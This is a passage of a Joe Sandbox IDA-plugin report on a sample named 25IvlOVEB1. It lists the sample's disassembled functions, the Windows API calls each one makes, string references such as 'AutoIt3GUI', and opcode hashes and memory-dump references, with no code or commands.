Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 49e1dc35abd3b96234a025790c42883e51e33a86d5788befe254e61b0f61d854
Instruction ID: 3c5745ac5d1d9677ab55abaa49d907c849963fce2250f4f40c489c01239a9d2a
Opcode Fuzzy Hash: 49e1dc35abd3b96234a025790c42883e51e33a86d5788befe254e61b0f61d854
Instruction Fuzzy Hash: D011A93A200306EFDB25AF24D845EBE77A9FF45710B40803AF906CB2A1EB719851D7A1

Function 000A50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 000A5101

Part of subcall function 0009571C: __FF_MSGBANNER.LIBCMT ref: 00095733
Part of subcall function 0009571C: __NMSG_WRITE.LIBCMT ref: 0009573A
Part of subcall function 0009571C: RtlAllocateHeap.NTDLL(01510000,00000000,00000001,00000000,?,?,?,00090DD3,?), ref: 0009575F

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 1e8c946aa51344cd069f74fd92c8aca9695e1fc5d702a00ef91bd2188cf7a89e
Instruction ID: a690f27d000a8e0a817e5bbf95aeadafc8240a29fe1c983c6f74a1ba085f6a6d
Opcode Fuzzy Hash: 1e8c946aa51344cd069f74fd92c8aca9695e1fc5d702a00ef91bd2188cf7a89e
Instruction Fuzzy Hash: AA110672505A12AECF312FF0BC45BBE37D8BF16362B10452AF9049A252EF348980A790

Function 000744A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000744CF

Part of subcall function 0007407C: _memset.LIBCMT ref: 000740FC
Part of subcall function 0007407C: _wcscpy.LIBCMT ref: 00074150
Part of subcall function 0007407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00074160

KillTimer.USER32(?,00000001,?,?), ref: 00074524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00074533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000AD4B9

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 066964c56b9a90ea8fd6acffaf40b0d96191d9e1bd85eb769ea8e57458f102ab
Instruction ID: fcc0fceb485e3e01abcd7a11b3906d2a83dfa54ed45160b422a96c04fc4599fa
Opcode Fuzzy Hash: 066964c56b9a90ea8fd6acffaf40b0d96191d9e1bd85eb769ea8e57458f102ab
Instruction Fuzzy Hash: 7A2107B0904784AFE772CB648855BFBBBECAF06314F04409EE78E56142C3782A84DB45

Function 000E6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00075A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,000D7896,?,?,00000000), ref: 00075A2C
Part of subcall function 00075A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,000D7896,?,?,00000000,?,?), ref: 00075A50

gethostbyname.WSOCK32(?,?,?), ref: 000E6399
WSAGetLastError.WSOCK32(00000000), ref: 000E63A4
_memmove.LIBCMT ref: 000E63D1
inet_ntoa.WSOCK32(?), ref: 000E63DC

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: b68502d9f1397528f2777d4d44961f5c38bc2846c5a7b7fefad678eaedef16ac
Instruction ID: 4bc14f59a46dfd07f41e493f1d90829dcd4e3f3d2f7dafe4b6c50d9293ef51a6
Opcode Fuzzy Hash: b68502d9f1397528f2777d4d44961f5c38bc2846c5a7b7fefad678eaedef16ac
Instruction Fuzzy Hash: 2D115171900109AFCB00FBA4DD86DFEB7B8AF04311B148065F509B7262DF75AE04DB61

Function 000C8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 000C8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000C8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000C8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000C8BA4

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3ab5c3ff00994eea3bd95e38669eb24c65660dc461046629d88ffc0c71dff75b
Instruction ID: eb8ed33f5a8364a9e396b27133d075a92f9bfd76f7aa5356f0c283b2258e08bd
Opcode Fuzzy Hash: 3ab5c3ff00994eea3bd95e38669eb24c65660dc461046629d88ffc0c71dff75b
Instruction Fuzzy Hash: 0C110679901218BFEB11DBA5C885FADBBB8EB48710F2040A5EA00B7290DB716E11DB94

Function 00071290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00072612: GetWindowLongW.USER32(?,000000EB), ref: 00072623

DefDlgProcW.USER32(?,00000020,?), ref: 000712D8
GetClientRect.USER32(?,?), ref: 000AB5FB
GetCursorPos.USER32(?), ref: 000AB605
ScreenToClient.USER32(?,?), ref: 000AB610

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 7c945bdfa3417ca38a2ebe224c22e2aced0fda9d73587bc83cb20eafeccc41a6
Instruction ID: 9e5b0230054ed7c1b9bd0f7c6b03fe77331f73fb55fba673ee1e03285a11f7c6
Opcode Fuzzy Hash: 7c945bdfa3417ca38a2ebe224c22e2aced0fda9d73587bc83cb20eafeccc41a6
Instruction Fuzzy Hash: DD112E35900419EBDB10DF98D8859FE77B9EF05300F404455FA05E7542C734AA62DBA9

Function 000CD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 000CD84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 000CD864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000CD879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 000CD897

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: f2b90d713dcc25bdfd00162542efd32aeee9f896dbd945f638675e337f700a59
Instruction ID: 6467284254d134be8802b2cff26c8383bf2c24e6f3f7c9b89522443a5dee540d
Opcode Fuzzy Hash: f2b90d713dcc25bdfd00162542efd32aeee9f896dbd945f638675e337f700a59
Instruction Fuzzy Hash: FF115E75605305EBE3208F50DC48FAABBBCEF40B00F10857EA616D6450DBB5E549EBA1

Function 000A6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 000A6FDB

Part of subcall function 000A76C2: __fltout2.LIBCMT ref: 000A76EB

__cftog_l.LIBCMT ref: 000A7001
__cftoe_l.LIBCMT ref: 000A7033

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: e2c0b0fe3bbdef4be9d588f70826a68c32a8585aed0e0ecf6098135644211894
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 00014B7654814AFBCF265EC4CC05CEE3F66BB2A350B588415FA5C58031D236C9B2AB81

Function 000FB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 000FB2E4
ScreenToClient.USER32(?,?), ref: 000FB2FC
ScreenToClient.USER32(?,?), ref: 000FB320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 000FB33B

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 4ac23debdc1870e2fa31e88e53d2b5a8e8615aefc58bbfec2bc5c2af0a2015c0
Instruction ID: ffc7007d96b505b038ab1e2823006529a1e0d439e22637d070be3e901b366b39
Opcode Fuzzy Hash: 4ac23debdc1870e2fa31e88e53d2b5a8e8615aefc58bbfec2bc5c2af0a2015c0
Instruction Fuzzy Hash: 74113475D0020AEFDB41DF99C4849EEBBF5FF08210F104166E914E2620D735AA55DF50

Function 000FB635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000FB644
_memset.LIBCMT ref: 000FB653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00136F20,00136F64), ref: 000FB682
CloseHandle.KERNEL32 ref: 000FB694

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 5fc43a06f487a718689d88e61b8118254698cb544373aafd0db5c12318421424
Instruction ID: 3e72781ac091789df9978dbc7b116a5662d4f00635f8832af33c3a8c3d09a253
Opcode Fuzzy Hash: 5fc43a06f487a718689d88e61b8118254698cb544373aafd0db5c12318421424
Instruction Fuzzy Hash: FEF05EB2541304BBF6102761BC16FBB3A9CEB09395F008020BA08E9592D7754C00DBB8

Function 000D6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 000D6BE6

Part of subcall function 000D76C4: _memset.LIBCMT ref: 000D76F9

_memmove.LIBCMT ref: 000D6C09
_memset.LIBCMT ref: 000D6C16
LeaveCriticalSection.KERNEL32(?), ref: 000D6C26

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: e682ab02f1c370f88b3e7d1c54e3ece7427c0e6268fe3f34618cbb9774d13c2a
Instruction ID: 877827584eeb45d6f7d06c72a48e20b69b5ae18cadaa9ca218bbf56c1fe9f3b0
Opcode Fuzzy Hash: e682ab02f1c370f88b3e7d1c54e3ece7427c0e6268fe3f34618cbb9774d13c2a
Instruction Fuzzy Hash: 7AF05E3A200200BBCF416F55DC85A9ABF29EF45320F04C061FE089E227D735E811DBB4

Function 00072218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00072231
SetTextColor.GDI32(?,000000FF), ref: 0007223B
SetBkMode.GDI32(?,00000001), ref: 00072250
GetStockObject.GDI32(00000005), ref: 00072258
GetWindowDC.USER32(?,00000000), ref: 000ABE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 000ABE90
GetPixel.GDI32(00000000,?,00000000), ref: 000ABEA9
GetPixel.GDI32(00000000,00000000,?), ref: 000ABEC2
GetPixel.GDI32(00000000,?,?), ref: 000ABEE2
ReleaseDC.USER32(?,00000000), ref: 000ABEED

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 76393f609056f4103ce48eab1eb0d87231123049d48b3e6b91fcb741da2d0911
Instruction ID: 768f4c3bee90c1d5b1ba81f2a9f668afeb85b9c079a65a5965a59cbd531deb9e
Opcode Fuzzy Hash: 76393f609056f4103ce48eab1eb0d87231123049d48b3e6b91fcb741da2d0911
Instruction Fuzzy Hash: CBE03932504245AAEB615FA4EC4D7F83B60EB06332F048366FA69480E287764990EB12

Function 000C8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000C871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,000C82E6), ref: 000C8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000C82E6), ref: 000C872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,000C82E6), ref: 000C8736

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 311953e60ecb7d23d5dda24bea2a80b166cfa0dade53271dbcd925d2221fe29f
Instruction ID: f3dfd168945ee91e66751c4fabad86e66af11c40dec318ae915bc6a8b4d5baff
Opcode Fuzzy Hash: 311953e60ecb7d23d5dda24bea2a80b166cfa0dade53271dbcd925d2221fe29f
Instruction Fuzzy Hash: E2E086366152139BE7605FB05D0CF7A3BACEF50791F14882CB245C9040EA38C441DB54

Function 000CB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 000CB4BE

Strings

AutoIt3GUI, xrefs: 000CB436
Container, xrefs: 000CB43B

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 643f58a0c9e05567cc8b7a707c6722c5f28b02555ee745241b8e0dc8cf5ac431
Instruction ID: c0ce63a101da2b514575a8026827f6d158315e6cba628ffaf64da3359bb5dad9
Opcode Fuzzy Hash: 643f58a0c9e05567cc8b7a707c6722c5f28b02555ee745241b8e0dc8cf5ac431
Instruction Fuzzy Hash: BF913870600601AFDB64DF64C885F6ABBE5FF48710F20856EF94ADB2A1DB71E941CB50

Function 000DAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0008FC86: _wcscpy.LIBCMT ref: 0008FCA9

Part of subcall function 00079837: __itow.LIBCMT ref: 00079862
Part of subcall function 00079837: __swprintf.LIBCMT ref: 000798AC

__wcsnicmp.LIBCMT ref: 000DB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 000DB0F6

Strings

LPT, xrefs: 000DB027

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 1245a22acefb7fa265d2a4705c4f9363e17be95400ce1bfe378e30d43424056c
Instruction ID: dd35f4e38d56f49138d4bbf5d65c26deab92e28bb817f7e16a5cc3be44d9e1ce
Opcode Fuzzy Hash: 1245a22acefb7fa265d2a4705c4f9363e17be95400ce1bfe378e30d43424056c
Instruction Fuzzy Hash: 3E615D75A00219EFCB14DF94C891EAEB7F4AB09710F11806AF916AB391DB70AE44CB65

Function 00082957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00082968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00082981

Strings

@, xrefs: 00082975

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 671381ac53d9a7c395681a7883104a9dac58e2c99338b10b50f6b9918ddcd0bf
Instruction ID: 80215c71bdf2e4a1fe586892bf957b56443236db9fe3ff8b5c3a01901217c22f
Opcode Fuzzy Hash: 671381ac53d9a7c395681a7883104a9dac58e2c99338b10b50f6b9918ddcd0bf
Instruction Fuzzy Hash: 4A5137718187449BE320AF10D886BEBBBE8FB85754F41885DF2D8410A2DF358569CB6A

Function 000D9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00074F0B: __fread_nolock.LIBCMT ref: 00074F29

_wcscmp.LIBCMT ref: 000D9824
_wcscmp.LIBCMT ref: 000D9837

Strings

FILE, xrefs: 000D9770

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 459ba97d34eb2c29e8f5e4293bc86e9150ed466d176cdf22a6e423f927b947bb
Instruction ID: 00e0f8d52a2cd463baa01047fec9bd794663e586168da8c0a6314ca7ae4c780f
Opcode Fuzzy Hash: 459ba97d34eb2c29e8f5e4293bc86e9150ed466d176cdf22a6e423f927b947bb
Instruction Fuzzy Hash: 5741D531A00319BADF209AA0CC45FEFBBFDDF85710F00407AF904A7292DB759A049B65

Function 000E258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000E259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 000E25D4

Strings

|, xrefs: 000E25A5

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 8d8e2f7b4f45fd4121d74178a5a9323265a1f098cda30b59b1a430859ed6fd88
Instruction ID: ff8db69db35e1e0b63d384439492e15fbc4003f0cf5e3595eb92fb2205f3d771
Opcode Fuzzy Hash: 8d8e2f7b4f45fd4121d74178a5a9323265a1f098cda30b59b1a430859ed6fd88
Instruction Fuzzy Hash: 83313671C04149AFCF55AFA1CC85EEEBFB8FF08340F104059E918B6162EB355956DBA0

Function 000F7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 000F7B61
